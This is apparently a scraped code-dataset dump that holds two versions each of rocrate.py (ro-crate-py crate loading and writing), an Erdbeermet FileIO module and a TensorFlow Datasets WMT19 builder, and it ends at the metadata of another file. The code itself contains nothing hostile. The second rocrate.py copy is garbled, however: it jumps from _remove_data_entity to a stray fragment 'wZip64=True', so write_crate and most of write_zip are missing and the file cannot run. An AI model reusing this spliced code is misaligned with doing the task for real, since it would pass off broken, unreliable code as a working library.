] | null | null | null |
rocrate/rocrate.py
|
sourav0220/ro-crate-py
|
e279fc7ddf188f0b22b671ab9c670f3333b477e1
|
[
"Apache-2.0"
] | null | null | null |
rocrate/rocrate.py
|
sourav0220/ro-crate-py
|
e279fc7ddf188f0b22b671ab9c670f3333b477e1
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2019-2020 The University of Manchester, UK
# Copyright 2020 Vlaams Instituut voor Biotechnologie (VIB), BE
# Copyright 2020 Barcelona Supercomputing Center (BSC), ES
# Copyright 2020 Center for Advanced Studies, Research and Development in Sardinia (CRS4), IT
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import importlib
import json
import os
import uuid
import requests
import zipfile
import atexit
import shutil
import tempfile
from pathlib import Path
from .model import contextentity
from .model.root_dataset import RootDataset
from .model.file import File
from .model.person import Person
from .model.dataset import Dataset
from .model.metadata import Metadata, LegacyMetadata
from .model.preview import Preview
from arcp import generate
TEST_METADATA_BASENAME = "test-metadata.json"
class ROCrate():
def __init__(self, source_path=None, load_preview=False):
self.default_entities = []
self.data_entities = []
self.contextual_entities = []
# TODO: add this as @base in the context? At least when loading
# from zip
self.uuid = uuid.uuid4()
# TODO: default_properties must include name, description,
# datePublished, license
if not source_path or not load_preview:
# create preview entity and add it to default_entities
self.preview = Preview(self)
self.default_entities.append(self.preview)
if not source_path:
# create a new ro-crate
self.root_dataset = RootDataset(self)
self.default_entities.append(self.root_dataset)
self.metadata = Metadata(self)
self.default_entities.append(self.metadata)
else:
# load an existing ro-crate
if zipfile.is_zipfile(source_path):
zip_path = tempfile.mkdtemp(prefix="ro", suffix="crate")
atexit.register(shutil.rmtree, zip_path)
with zipfile.ZipFile(source_path, "r") as zip_file:
zip_file.extractall(zip_path)
source_path = zip_path
metadata_path = os.path.join(source_path, Metadata.BASENAME)
MetadataClass = Metadata
if not os.path.isfile(metadata_path):
metadata_path = os.path.join(source_path, LegacyMetadata.BASENAME)
MetadataClass = LegacyMetadata
if not os.path.isfile(metadata_path):
raise ValueError('The directory is not a valid RO-crate, '
f'missing {Metadata.BASENAME}')
self.metadata = MetadataClass(self)
self.default_entities.append(self.metadata)
entities = self.entities_from_metadata(metadata_path)
self.build_crate(entities, source_path, load_preview)
# TODO: load root dataset properties
def entities_from_metadata(self, metadata_path):
# Creates a dictionary {id: entity} from the metadata file
with open(metadata_path) as metadata_file:
metadata_jsonld = json.load(metadata_file)
# TODO: should validate the json-ld
if '@graph' in metadata_jsonld.keys():
entities_dict = {}
for entity in metadata_jsonld['@graph']:
entities_dict[entity['@id']] = entity
# print(entity)
return entities_dict
else:
raise ValueError('The metadata file has no @graph')
def find_root_entity_id(self, entities):
"""Find Metadata file and Root Data Entity in RO-Crate.
Returns a tuple of the @id identifiers (metadata, root)
"""
# Note that for all cases below we will deliberately
# throw KeyError if "about" exists but it has no "@id"
# First let's try conformsTo algorithm in
# <https://www.researchobject.org/ro-crate/1.1/root-data-entity.html#finding-the-root-data-entity>
for entity in entities.values():
conformsTo = entity.get("conformsTo")
if conformsTo and "@id" in conformsTo:
conformsTo = conformsTo["@id"]
if conformsTo and conformsTo.startswith("https://w3id.org/ro/crate/"):
if "about" in entity:
return (entity["@id"], entity["about"]["@id"])
# ..fall back to a generous look up by filename,
for candidate in (
Metadata.BASENAME, LegacyMetadata.BASENAME,
f"./{Metadata.BASENAME}", f"./{LegacyMetadata.BASENAME}"
):
metadata_file = entities.get(candidate)
if metadata_file and "about" in metadata_file:
return (metadata_file["@id"], metadata_file["about"]["@id"])
# No luck! Is there perhaps a root dataset directly in here?
root = entities.get("./", {})
# FIXME: below will work both for
# "@type": "Dataset"
# "@type": ["Dataset"]
# ..but also the unlikely
# "@type": "DatasetSomething"
if root and "Dataset" in root.get("@type", []):
return (None, "./")
# Uh oh..
raise KeyError("Can't find Root Data Entity in RO-Crate, see https://www.researchobject.org/ro-crate/1.1/root-data-entity.html")
def build_crate(self, entities, source, load_preview):
# add data and contextual entities to the crate
(metadata_id, root_id) = self.find_root_entity_id(entities)
root_entity = entities[root_id]
root_entity_parts = root_entity['hasPart']
# remove hasPart and id from root_entity and add the rest of the
# properties to the build
root_entity.pop('@id', None)
root_entity.pop('hasPart', None)
self.root_dataset = RootDataset(self, root_entity)
self.default_entities.append(self.root_dataset)
# check if a preview is present
if Preview.BASENAME in entities.keys() and load_preview:
preview_source = os.path.join(source, Preview.BASENAME)
self.preview = Preview(self, preview_source)
self.default_entities.append(self.preview)
added_entities = []
# iterate over data entities
for data_entity_ref in root_entity_parts:
data_entity_id = data_entity_ref['@id']
# print(data_entity_id)
entity = entities[data_entity_id]
# basic checks should be moved to a separate function
if '@type' not in entity.keys():
raise Exception("Entity with @id:" + data_entity_id +
" has no type defined")
# Data entities can have an array as @type. So far we just parse
# them as File class if File is in the list. For further
# extensions (e.g if a Workflow class is created) we can add extra
# cases or create a mapping table for specific combinations. See
# https://github.com/ResearchObject/ro-crate/issues/83
entity_types = (entity['@type']
if isinstance(entity['@type'], list)
else [entity['@type']])
if 'File' in entity_types:
file_path = os.path.join(source, entity['@id'])
identifier = entity.pop('@id', None)
if os.path.exists(file_path):
# referencing a file path relative to crate-root
instance = File(self, file_path, identifier, properties=entity)
else:
# check if it is a valid absolute URI
try:
requests.get(identifier)
instance = File(self, identifier, properties=entity)
except requests.ConnectionError:
print("Source is not a valid URI")
if 'Dataset' in entity_types:
dir_path = os.path.join(source, entity['@id'])
if os.path.exists(dir_path):
props = {k: v for k, v in entity.items() if k != '@id'}
instance = Dataset(self, dir_path, entity['@id'], props)
else:
raise Exception('Directory not found')
self._add_data_entity(instance)
added_entities.append(data_entity_id)
# the rest of the entities must be contextual entities
prebuilt_entities = [
root_id, metadata_id, Preview.BASENAME
]
for identifier, entity in entities.items():
if identifier not in added_entities + prebuilt_entities:
# should this be done in the extract entities?
entity.pop('@id', None)
# contextual entities should not have @type array
# (see https://github.com/ResearchObject/ro-crate/issues/83)
if entity['@type'] in [
cls.__name__
for cls in contextentity.ContextEntity.__subclasses__()
]:
module_name = 'rocrate.model.' + entity['@type'].lower()
SubClass = getattr(
importlib.import_module(module_name, package=None),
entity['@type']
)
instance = SubClass(self, identifier, entity)
else:
instance = contextentity.ContextEntity(
self, identifier, entity
)
self._add_context_entity(instance)
# TODO: add contextual entities
# def add_contact_point(id, properties = {})
# def add_organization(id, properties = {})
# add properties: name datePublished author license identifier
# distribution contactPoint publisher funder description url hasPart.
# publisher should be an Organization though it MAY be a Person. funder
# should reference an Organization
@property
def name(self):
return self.root_dataset['name']
@name.setter
def name(self, value):
self.root_dataset['name'] = value
@property
def datePublished(self):
return self.root_dataset.datePublished
@datePublished.setter
def datePublished(self, value):
self.root_dataset.datePublished = value
@property
def creator(self):
return self.root_dataset['creator']
@creator.setter
def creator(self, value):
self.root_dataset['creator'] = value
@property
def license(self):
return self.root_dataset['license']
@license.setter
def license(self, value):
self.root_dataset['license'] = value
@property
def description(self):
return self.root_dataset['description']
@description.setter
def description(self, value):
self.root_dataset['description'] = value
@property
def keywords(self):
return self.root_dataset['keywords']
@keywords.setter
def keywords(self, value):
self.root_dataset['keywords'] = value
@property
def publisher(self):
return self.root_dataset['publisher']
@publisher.setter
def publisher(self, value):
self.root_dataset['publisher'] = value
@property
def isBasedOn(self):
return self.root_dataset['isBasedOn']
@isBasedOn.setter
def isBasedOn(self, value):
self.root_dataset['isBasedOn'] = value
@property
def image(self):
return self.root_dataset['image']
@image.setter
def image(self, value):
self.root_dataset['image'] = value
@property
def CreativeWorkStatus(self):
return self.root_dataset['CreativeWorkStatus']
@CreativeWorkStatus.setter
def CreativeWorkStatus(self, value):
self.root_dataset['CreativeWorkStatus'] = value
@property
def test_dir(self):
rval = self.dereference("test")
if rval and "Dataset" in rval.type:
return rval
return None
@property
def examples_dir(self):
rval = self.dereference("examples")
if rval and "Dataset" in rval.type:
return rval
return None
@property
def test_metadata_path(self):
if self.test_dir is None:
return None
return Path(self.test_dir.filepath()) / TEST_METADATA_BASENAME
def resolve_id(self, relative_id):
return generate.arcp_random(relative_id.strip('./'), uuid=self.uuid)
def get_entities(self):
return (self.default_entities + self.data_entities +
self.contextual_entities)
def set_main_entity(self, main_entity):
self.root_dataset['mainEntity'] = main_entity
def _get_root_jsonld(self):
self.root_dataset.properties()
def dereference(self, entity_id):
canonical_id = self.resolve_id(entity_id)
for entity in self.get_entities():
if canonical_id == entity.canonical_id():
return entity
return None
# source: file object or path (str)
def add_file(self, source, crate_path=None, fetch_remote=False,
properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
file_entity = File(self, source=source, dest_path=crate_path, fetch_remote=fetch_remote, properties=props)
self._add_data_entity(file_entity)
return file_entity
def remove_file(self, file_id):
# if file in data_entities:
self._remove_data_entity(file_id)
def add_directory(self, source, crate_path=None, properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
dataset_entity = Dataset(self, source, crate_path, properties)
self._add_data_entity(dataset_entity)
return dataset_entity
def remove_directory(self, dir_id):
# if file in data_entities:
self._remove_data_entity(dir_id)
def _add_data_entity(self, data_entity):
self._remove_data_entity(data_entity)
self.data_entities.append(data_entity)
def _remove_data_entity(self, data_entity):
if data_entity in self.data_entities:
self.data_entities.remove(data_entity)
################################
# Contextual entities #
################################
def _add_context_entity(self, entity):
if entity in self.contextual_entities:
self.contextual_entities.remove(entity)
self.contextual_entities.append(entity)
def add_person(self, identifier=None, properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
new_person = Person(self, identifier, props)
self._add_context_entity(new_person)
return new_person
# TODO
# def fetch_all(self):
# fetch all files defined in the crate
# write crate to local dir
def write_crate(self, base_path):
Path(base_path).mkdir(parents=True, exist_ok=True)
# write data entities
for writable_entity in self.data_entities + self.default_entities:
writable_entity.write(base_path)
def write_zip(self, out_zip):
if str(out_zip).endswith('.zip'):
out_file_path = out_zip
else:
out_file_path = out_zip + '.zip'
zf = zipfile.ZipFile(
out_file_path, 'w', compression=zipfile.ZIP_DEFLATED,
allowZip64=True
)
for writable_entity in self.data_entities + self.default_entities:
writable_entity.write_zip(zf)
zf.close()
return zf.filename
| 37.42093
| 136
| 0.618358
|
import importlib
import json
import os
import uuid
import requests
import zipfile
import atexit
import shutil
import tempfile
from pathlib import Path
from .model import contextentity
from .model.root_dataset import RootDataset
from .model.file import File
from .model.person import Person
from .model.dataset import Dataset
from .model.metadata import Metadata, LegacyMetadata
from .model.preview import Preview
from arcp import generate
TEST_METADATA_BASENAME = "test-metadata.json"
class ROCrate():
def __init__(self, source_path=None, load_preview=False):
self.default_entities = []
self.data_entities = []
self.contextual_entities = []
self.uuid = uuid.uuid4()
if not source_path or not load_preview:
self.preview = Preview(self)
self.default_entities.append(self.preview)
if not source_path:
self.root_dataset = RootDataset(self)
self.default_entities.append(self.root_dataset)
self.metadata = Metadata(self)
self.default_entities.append(self.metadata)
else:
if zipfile.is_zipfile(source_path):
zip_path = tempfile.mkdtemp(prefix="ro", suffix="crate")
atexit.register(shutil.rmtree, zip_path)
with zipfile.ZipFile(source_path, "r") as zip_file:
zip_file.extractall(zip_path)
source_path = zip_path
metadata_path = os.path.join(source_path, Metadata.BASENAME)
MetadataClass = Metadata
if not os.path.isfile(metadata_path):
metadata_path = os.path.join(source_path, LegacyMetadata.BASENAME)
MetadataClass = LegacyMetadata
if not os.path.isfile(metadata_path):
raise ValueError('The directory is not a valid RO-crate, '
f'missing {Metadata.BASENAME}')
self.metadata = MetadataClass(self)
self.default_entities.append(self.metadata)
entities = self.entities_from_metadata(metadata_path)
self.build_crate(entities, source_path, load_preview)
def entities_from_metadata(self, metadata_path):
with open(metadata_path) as metadata_file:
metadata_jsonld = json.load(metadata_file)
if '@graph' in metadata_jsonld.keys():
entities_dict = {}
for entity in metadata_jsonld['@graph']:
entities_dict[entity['@id']] = entity
return entities_dict
else:
raise ValueError('The metadata file has no @graph')
def find_root_entity_id(self, entities):
# <https://www.researchobject.org/ro-crate/1.1/root-data-entity.html#finding-the-root-data-entity>
for entity in entities.values():
conformsTo = entity.get("conformsTo")
if conformsTo and "@id" in conformsTo:
conformsTo = conformsTo["@id"]
if conformsTo and conformsTo.startswith("https://w3id.org/ro/crate/"):
if "about" in entity:
return (entity["@id"], entity["about"]["@id"])
# ..fall back to a generous look up by filename,
for candidate in (
Metadata.BASENAME, LegacyMetadata.BASENAME,
f"./{Metadata.BASENAME}", f"./{LegacyMetadata.BASENAME}"
):
metadata_file = entities.get(candidate)
if metadata_file and "about" in metadata_file:
return (metadata_file["@id"], metadata_file["about"]["@id"])
# No luck! Is there perhaps a root dataset directly in here?
root = entities.get("./", {})
# FIXME: below will work both for
# "@type": "Dataset"
# "@type": ["Dataset"]
# ..but also the unlikely
# "@type": "DatasetSomething"
if root and "Dataset" in root.get("@type", []):
return (None, "./")
# Uh oh..
raise KeyError("Can't find Root Data Entity in RO-Crate, see https://www.researchobject.org/ro-crate/1.1/root-data-entity.html")
    def build_crate(self, entities, source, load_preview):
        """Populate this crate object from a parsed @graph dict.

        entities: dict mapping @id -> JSON-LD entity (as returned by
            entities_from_metadata).
        source: path of the directory the crate is being read from.
        load_preview: when true and a preview file is listed in the graph,
            wrap the existing file as a Preview default entity.
        """
        (metadata_id, root_id) = self.find_root_entity_id(entities)
        # Strip the structural keys from the root entity so RootDataset only
        # receives its descriptive properties.
        root_entity = entities[root_id]
        root_entity_parts = root_entity['hasPart']
        root_entity.pop('@id', None)
        root_entity.pop('hasPart', None)
        self.root_dataset = RootDataset(self, root_entity)
        self.default_entities.append(self.root_dataset)
        if Preview.BASENAME in entities.keys() and load_preview:
            preview_source = os.path.join(source, Preview.BASENAME)
            self.preview = Preview(self, preview_source)
            self.default_entities.append(self.preview)
        # Data entities: everything listed in the root dataset's hasPart.
        added_entities = []
        for data_entity_ref in root_entity_parts:
            data_entity_id = data_entity_ref['@id']
            entity = entities[data_entity_id]
            if '@type' not in entity.keys():
                raise Exception("Entity with @id:" + data_entity_id +
                                " has no type defined")
            # @type may be a string or a list; normalize to a list.
            entity_types = (entity['@type']
                            if isinstance(entity['@type'], list)
                            else [entity['@type']])
            if 'File' in entity_types:
                file_path = os.path.join(source, entity['@id'])
                identifier = entity.pop('@id', None)
                if os.path.exists(file_path):
                    instance = File(self, file_path, identifier, properties=entity)
                else:
                    # Not on disk: probe the identifier as a URL.  The
                    # response body is discarded -- this is only a
                    # reachability check.
                    # NOTE(review): when the probe raises ConnectionError,
                    # `instance` is left unset (or stale from a previous
                    # iteration) and _add_data_entity below raises NameError
                    # or adds the wrong entity -- needs a real fix.
                    try:
                        requests.get(identifier)
                        instance = File(self, identifier, properties=entity)
                    except requests.ConnectionError:
                        print("Source is not a valid URI")
            if 'Dataset' in entity_types:
                dir_path = os.path.join(source, entity['@id'])
                if os.path.exists(dir_path):
                    props = {k: v for k, v in entity.items() if k != '@id'}
                    instance = Dataset(self, dir_path, entity['@id'], props)
                else:
                    raise Exception('Directory not found')
            self._add_data_entity(instance)
            added_entities.append(data_entity_id)
        # Everything else in the graph (minus the prebuilt root/metadata/
        # preview ids) becomes a contextual entity.  When rocrate.model has
        # a ContextEntity subclass named like @type, instantiate it via
        # importlib; otherwise fall back to the generic ContextEntity.
        prebuilt_entities = [
            root_id, metadata_id, Preview.BASENAME
        ]
        for identifier, entity in entities.items():
            if identifier not in added_entities + prebuilt_entities:
                entity.pop('@id', None)
                if entity['@type'] in [
                    cls.__name__
                    for cls in contextentity.ContextEntity.__subclasses__()
                ]:
                    module_name = 'rocrate.model.' + entity['@type'].lower()
                    SubClass = getattr(
                        importlib.import_module(module_name, package=None),
                        entity['@type']
                    )
                    instance = SubClass(self, identifier, entity)
                else:
                    instance = contextentity.ContextEntity(
                        self, identifier, entity
                    )
                self._add_context_entity(instance)
    # ------------------------------------------------------------------
    # Convenience accessors: each property below proxies a key of
    # self.root_dataset, so crate-level metadata reads and writes like a
    # plain attribute.  (datePublished is the exception: it proxies an
    # attribute of RootDataset rather than a dict key.)
    # ------------------------------------------------------------------
    @property
    def name(self):
        return self.root_dataset['name']
    @name.setter
    def name(self, value):
        self.root_dataset['name'] = value
    @property
    def datePublished(self):
        return self.root_dataset.datePublished
    @datePublished.setter
    def datePublished(self, value):
        self.root_dataset.datePublished = value
    @property
    def creator(self):
        return self.root_dataset['creator']
    @creator.setter
    def creator(self, value):
        self.root_dataset['creator'] = value
    @property
    def license(self):
        return self.root_dataset['license']
    @license.setter
    def license(self, value):
        self.root_dataset['license'] = value
    @property
    def description(self):
        return self.root_dataset['description']
    @description.setter
    def description(self, value):
        self.root_dataset['description'] = value
    @property
    def keywords(self):
        return self.root_dataset['keywords']
    @keywords.setter
    def keywords(self, value):
        self.root_dataset['keywords'] = value
    @property
    def publisher(self):
        return self.root_dataset['publisher']
    @publisher.setter
    def publisher(self, value):
        self.root_dataset['publisher'] = value
    @property
    def isBasedOn(self):
        return self.root_dataset['isBasedOn']
    @isBasedOn.setter
    def isBasedOn(self, value):
        self.root_dataset['isBasedOn'] = value
    @property
    def image(self):
        return self.root_dataset['image']
    @image.setter
    def image(self, value):
        self.root_dataset['image'] = value
    @property
    def CreativeWorkStatus(self):
        return self.root_dataset['CreativeWorkStatus']
    @CreativeWorkStatus.setter
    def CreativeWorkStatus(self, value):
        self.root_dataset['CreativeWorkStatus'] = value
    @property
    def test_dir(self):
        # The entity registered under id "test", but only when it is a
        # Dataset (i.e. a directory); None otherwise.
        rval = self.dereference("test")
        if rval and "Dataset" in rval.type:
            return rval
        return None
    @property
    def examples_dir(self):
        # The entity registered under id "examples", but only when it is a
        # Dataset; None otherwise.
        rval = self.dereference("examples")
        if rval and "Dataset" in rval.type:
            return rval
        return None
    @property
    def test_metadata_path(self):
        # Filesystem path of the test-suite metadata file inside the test
        # directory, or None when the crate has no test directory.
        if self.test_dir is None:
            return None
        return Path(self.test_dir.filepath()) / TEST_METADATA_BASENAME
    def resolve_id(self, relative_id):
        # Canonicalize a crate-relative id to an arcp URI scoped by this
        # crate's uuid, so ids from different crates never collide.
        return generate.arcp_random(relative_id.strip('./'), uuid=self.uuid)
    def get_entities(self):
        # All entities known to the crate: defaults (root dataset, metadata,
        # preview), then data entities, then contextual entities.
        return (self.default_entities + self.data_entities +
                self.contextual_entities)
    def set_main_entity(self, main_entity):
        # Record *main_entity* as the crate's mainEntity on the root dataset.
        self.root_dataset['mainEntity'] = main_entity
def _get_root_jsonld(self):
self.root_dataset.properties()
def dereference(self, entity_id):
canonical_id = self.resolve_id(entity_id)
for entity in self.get_entities():
if canonical_id == entity.canonical_id():
return entity
return None
def add_file(self, source, crate_path=None, fetch_remote=False,
properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
file_entity = File(self, source=source, dest_path=crate_path, fetch_remote=fetch_remote, properties=props)
self._add_data_entity(file_entity)
return file_entity
    def remove_file(self, file_id):
        # NOTE(review): _remove_data_entity compares its argument against the
        # entity *objects* stored in self.data_entities, so passing a string
        # id here is a silent no-op unless callers actually pass the entity
        # itself -- confirm intended usage.
        self._remove_data_entity(file_id)
def add_directory(self, source, crate_path=None, properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
dataset_entity = Dataset(self, source, crate_path, properties)
self._add_data_entity(dataset_entity)
return dataset_entity
    def remove_directory(self, dir_id):
        # NOTE(review): same identifier-vs-object mismatch as remove_file --
        # _remove_data_entity matches entity objects, not id strings.
        self._remove_data_entity(dir_id)
    def _add_data_entity(self, data_entity):
        # Remove first so re-adding the same entity never duplicates it.
        self._remove_data_entity(data_entity)
        self.data_entities.append(data_entity)
    def _remove_data_entity(self, data_entity):
        # Membership test uses the entity's own equality; absent entities are
        # ignored silently.
        if data_entity in self.data_entities:
            self.data_entities.remove(data_entity)
wZip64=True
)
for writable_entity in self.data_entities + self.default_entities:
writable_entity.write_zip(zf)
zf.close()
return zf.filename
| true
| true
|
f718fbc2d26d5ffb3491afb7372ff14d83ab4105
| 2,368
|
py
|
Python
|
src/erdbeermet/tools/FileIO.py
|
bnittka/Erdbeermet
|
43c73d4cf3a918090320c7519a9ea09014f46744
|
[
"MIT"
] | 5
|
2021-12-02T14:53:02.000Z
|
2022-01-03T08:24:16.000Z
|
src/erdbeermet/tools/FileIO.py
|
bnittka/Erdbeermet
|
43c73d4cf3a918090320c7519a9ea09014f46744
|
[
"MIT"
] | 1
|
2022-01-10T09:07:44.000Z
|
2022-01-10T10:20:07.000Z
|
src/erdbeermet/tools/FileIO.py
|
bnittka/Erdbeermet
|
43c73d4cf3a918090320c7519a9ea09014f46744
|
[
"MIT"
] | 7
|
2021-12-13T14:56:33.000Z
|
2022-01-18T17:47:38.000Z
|
# -*- coding: utf-8 -*-
import re
def write_history(filename, history):
    """Write a list of (x, y, z, alpha, delta) events to *filename*.

    One event per line, formatted as ``(x, y: z) alpha; [d1,d2,...]``,
    with no trailing newline after the last event.
    """
    rendered = []
    for x, y, z, alpha, delta in history:
        delta_str = '[' + ','.join(str(d) for d in delta) + ']'
        rendered.append(f"({x}, {y}: {z}) {alpha}; {delta_str}")
    with open(filename, 'w') as f:
        f.write('\n'.join(rendered))
def _split_floats(floats):
return [float(item) for item in floats.split(',')]
def parse_history(filename):
    """Parse a history file written by write_history back into event tuples.

    Returns a list of (x, y, z, alpha, delta) with x, y, z ints, alpha a
    float and delta a list of floats.  Lines that do not match the event
    pattern are skipped silently.
    """
    event_regex = re.compile(r"\((\d+)\,\s*(\d+)\:\s*(\d+)\)\;?\s*(\d+\.?\d*e?-?\d+)\;\s*\[(?P<delta>(\s*\d+\.?\d*e?-?\d+,?)+)\]")
    history = []
    with open(filename, 'r') as f:
        for raw_line in f.readlines():
            m = event_regex.match(raw_line.strip())
            if not m:
                continue
            history.append((
                int(m.group(1)),
                int(m.group(2)),
                int(m.group(3)),
                float(m.group(4)),
                _split_floats(m.group('delta')),
            ))
    return history
def _write_matrix(f, V, D):
for i in range(len(V)):
f.write(f'\n{V[i]} ')
for j in range(len(V)):
f.write('{: 12.8f}'.format(D[i,j]))
def write_recognition(filename, tree, matrices=True):
    """Dump every node of a recognition tree (preorder) to *filename*.

    Nodes are separated by a dashed rule.  Per node: the element count n,
    the R-step (when present), the vertex set V, the branch's success
    count, the distance matrix (when *matrices* is true and available) and
    the abort reason for failed branches.
    """
    with open(filename, 'w') as f:
        for idx, node in enumerate(tree.preorder()):
            if idx:
                f.write('\n' + 80 * '-' + '\n')
            f.write(f'n={node.n}\n')
            if node.R_step is not None:
                f.write('(result of R-step: ({},{}:{}){:.8f})\n'.format(*node.R_step))
            f.write(f'V={node.V}\n')
            f.write(f'total successes of this branch: {node.valid_ways}\n')
            if matrices and node.D is not None:
                f.write(f'Matrix on {node.n} elements:\n')
                _write_matrix(f, node.V, node.D)
                f.write('\n')
            if not node.valid_ways:
                f.write(f'reason of abort: {node.info}\n')
| 26.909091
| 130
| 0.425676
|
import re
def write_history(filename, history):
with open(filename, 'w') as f:
start = True
for x, y, z, alpha, delta in history:
delta_str = '[' + ','.join(str(d) for d in delta) + ']'
if start:
f.write(f"({x}, {y}: {z}) {alpha}; {delta_str}")
start = False
else:
f.write(f"\n({x}, {y}: {z}) {alpha}; {delta_str}")
def _split_floats(floats):
return [float(item) for item in floats.split(',')]
def parse_history(filename):
event_regex = re.compile(r"\((\d+)\,\s*(\d+)\:\s*(\d+)\)\;?\s*(\d+\.?\d*e?-?\d+)\;\s*\[(?P<delta>(\s*\d+\.?\d*e?-?\d+,?)+)\]")
with open(filename, 'r') as f:
lines = f.readlines()
history = []
for line in lines:
match = event_regex.match(line.strip())
if match:
x = int(match.group(1))
y = int(match.group(2))
z = int(match.group(3))
alpha = float(match.group(4))
delta = _split_floats(match.group('delta'))
history.append((x, y, z, alpha, delta))
return history
def _write_matrix(f, V, D):
for i in range(len(V)):
f.write(f'\n{V[i]} ')
for j in range(len(V)):
f.write('{: 12.8f}'.format(D[i,j]))
def write_recognition(filename, tree, matrices=True):
with open(filename, 'w') as f:
start = True
for v in tree.preorder():
if not start:
f.write('\n')
f.write(80 * '-')
f.write('\n')
else:
start = False
f.write(f'n={v.n}\n')
if v.R_step is not None:
f.write('(result of R-step: ({},{}:{}){:.8f})\n'.format(*v.R_step))
f.write(f'V={v.V}\n')
f.write(f'total successes of this branch: {v.valid_ways}\n')
if matrices and v.D is not None:
f.write(f'Matrix on {v.n} elements:\n')
_write_matrix(f, v.V, v.D)
f.write('\n')
if not v.valid_ways:
f.write(f'reason of abort: {v.info}\n')
| true
| true
|
f718fd3a703f958aab1607b729f55dd3d248123d
| 2,222
|
py
|
Python
|
tensorflow_datasets/translate/wmt19.py
|
leenamaheshnikam10/datasets
|
762cc556c364ecbb930b825709aa81647d889300
|
[
"Apache-2.0"
] | 2
|
2019-10-20T05:40:10.000Z
|
2019-10-31T17:25:52.000Z
|
tensorflow_datasets/translate/wmt19.py
|
thanhkaist/datasets
|
02da35c558ec8ea704e744a2008c5cecb2e7a0a1
|
[
"Apache-2.0"
] | 1
|
2019-04-09T07:50:49.000Z
|
2019-04-09T07:51:10.000Z
|
tensorflow_datasets/translate/wmt19.py
|
thanhkaist/datasets
|
02da35c558ec8ea704e744a2008c5cecb2e7a0a1
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2019 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""WMT19: Translate dataset."""
import tensorflow_datasets.public_api as tfds
from tensorflow_datasets.translate import wmt
_URL = "http://www.statmt.org/wmt19/translation-task.html"
# TODO(adarob): Update with citation of overview paper once it is published.
_CITATION = """
@ONLINE {wmt19translate,
author = "Wikimedia Foundation",
title = "ACL 2019 Fourth Conference on Machine Translation (WMT19), Shared Task: Machine Translation of News",
url = "http://www.statmt.org/wmt19/translation-task.html"
}
"""
_LANGUAGE_PAIRS = [
(lang, "en") for lang in ["cs", "de", "fi", "gu", "kk", "lt", "ru", "zh"]
] + [("fr", "de")]
class Wmt19Translate(wmt.WmtTranslate):
  """WMT 19 translation datasets for {(xx, "en")} + ("fr", "de") pairs."""
  # One BuilderConfig per language pair in _LANGUAGE_PAIRS; every pair
  # shares dataset version 0.0.3.
  BUILDER_CONFIGS = [
      wmt.WmtConfig(  # pylint:disable=g-complex-comprehension
          description="WMT 2019 %s-%s translation task dataset." % (l1, l2),
          url=_URL,
          citation=_CITATION,
          language_pair=(l1, l2),
          version="0.0.3")
      for l1, l2 in _LANGUAGE_PAIRS
  ]
  @property
  def _subsets(self):
    # Names of the raw WMT subsets each split is assembled from; consumed by
    # the wmt.WmtTranslate base class.  Suffixed entries ("_frde", "_ru",
    # "_ltfi") and CWMT_SUBSET_NAMES look pair-specific -- presumably
    # filtered per language pair by the base builder (TODO confirm).
    return {
        tfds.Split.TRAIN: [
            "europarl_v9", "europarl_v7_frde", "paracrawl_v3",
            "paracrawl_v1_ru", "paracrawl_v3_frde", "commoncrawl",
            "commoncrawl_frde", "newscommentary_v14", "newscommentary_v14_frde",
            "czeng_17", "yandexcorpus", "wikititles_v1", "uncorpus_v1",
            "rapid_2016_ltfi", "rapid_2019"] + wmt.CWMT_SUBSET_NAMES,
        tfds.Split.VALIDATION: [
            "euelections_dev2019", "newsdev2019", "newstest2018"]
    }
| 36.42623
| 115
| 0.673267
|
import tensorflow_datasets.public_api as tfds
from tensorflow_datasets.translate import wmt
_URL = "http://www.statmt.org/wmt19/translation-task.html"
_CITATION = """
@ONLINE {wmt19translate,
author = "Wikimedia Foundation",
title = "ACL 2019 Fourth Conference on Machine Translation (WMT19), Shared Task: Machine Translation of News",
url = "http://www.statmt.org/wmt19/translation-task.html"
}
"""
_LANGUAGE_PAIRS = [
(lang, "en") for lang in ["cs", "de", "fi", "gu", "kk", "lt", "ru", "zh"]
] + [("fr", "de")]
class Wmt19Translate(wmt.WmtTranslate):
BUILDER_CONFIGS = [
wmt.WmtConfig(
description="WMT 2019 %s-%s translation task dataset." % (l1, l2),
url=_URL,
citation=_CITATION,
language_pair=(l1, l2),
version="0.0.3")
for l1, l2 in _LANGUAGE_PAIRS
]
@property
def _subsets(self):
return {
tfds.Split.TRAIN: [
"europarl_v9", "europarl_v7_frde", "paracrawl_v3",
"paracrawl_v1_ru", "paracrawl_v3_frde", "commoncrawl",
"commoncrawl_frde", "newscommentary_v14", "newscommentary_v14_frde",
"czeng_17", "yandexcorpus", "wikititles_v1", "uncorpus_v1",
"rapid_2016_ltfi", "rapid_2019"] + wmt.CWMT_SUBSET_NAMES,
tfds.Split.VALIDATION: [
"euelections_dev2019", "newsdev2019", "newstest2018"]
}
| true
| true
|
f718fd47d1d672bb8ec94a96424517579c5f1682
| 7,525
|
py
|
Python
|
perfAnalysis.py
|
malllabiisc/kg-geometry
|
d5b40d6795085109da5438cdc1d83d32fd5fc373
|
[
"Apache-2.0"
] | 18
|
2018-07-31T06:33:45.000Z
|
2021-07-22T11:27:40.000Z
|
perfAnalysis.py
|
malllabiisc/kg-geometry
|
d5b40d6795085109da5438cdc1d83d32fd5fc373
|
[
"Apache-2.0"
] | 3
|
2018-07-30T02:48:06.000Z
|
